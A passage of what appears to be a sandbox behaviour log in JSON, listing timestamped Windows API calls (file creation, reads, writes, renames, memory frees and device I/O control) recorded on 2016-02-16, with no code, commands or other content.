"2016-02-16 
17:41:51,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,636", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,646", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,646", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,646", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,656", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,656", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,656", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,666", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,666", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:51,676", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,676", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,676", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,696", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,706", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,706", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,706", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,717", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,717", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,727", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:51,727", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,727", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,737", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,737", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,737", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:51,747", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,747", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,747", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,757", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:51,767", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,767", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,777", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,787", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,787", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,797", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:51,817", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,817", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,837", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,847", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:51,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:51,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,887", "api": 
"DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,887", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:51,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,907", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:51,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,927", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 